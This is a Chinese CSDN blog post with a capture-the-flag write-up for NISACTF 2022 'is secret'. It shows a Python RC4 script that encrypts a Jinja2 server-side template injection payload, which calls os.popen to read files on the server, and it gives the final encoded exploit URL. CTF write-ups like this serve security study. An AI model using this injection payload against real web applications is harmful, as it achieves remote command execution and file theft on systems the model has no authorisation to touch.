每日练习-[NISACTF 2022]is secret

本文讲述了如何利用rc4加密技术与SSTI(服务器端模板注入)相结合,通过给定密钥对参数进行解密并实现恶意注入攻击的过程,展示了攻击者如何构造payload利用这些技术进行操作。
摘要由CSDN通过智能技术生成
ssti和rc4加密结合

dir扫出secret页面. 

 随便传参内容,报错页面找到可疑代码

 给了密钥HereIsTreasure以及是rc4加密对传参内容进行解密,同时为ssti注入.

找了师傅们的rc4加密脚本

import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
    # print("RC4加密主函数")
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return  crypt
def rc4_init_sbox(key):
    s_box = list(range(256))
    # print("原来的 s 盒:%s" % s_box)
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    # print("混乱后的 s 盒:%s"% s_box)
    return s_box
def rc4_excrypt(plain, box):
    # print("调用加密程序成功。")
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    print("加密后的字符串是:%s" %quote(cipher))
    return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{lipsum.__globals__.os.popen('cat /f*').read()}}")

 payload:

?secret=.%14U%5C%C2%BA%14%1Ec%25%C2%A2%C3%A7%14%C2%B2%C2%BD%C3%B4%C2%A98%C2%80k%0B%C3%B9%5D%C3%B3%3C%1A%C2%9E%28%C2%8C%5C%C2%84u%C3%A4%2C%C2%9F%0D%C2%99%0E%C2%BBo%C2%AD5%C3%88%C2%88%C3%A3iF%C3%B4%07%C2%B8

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值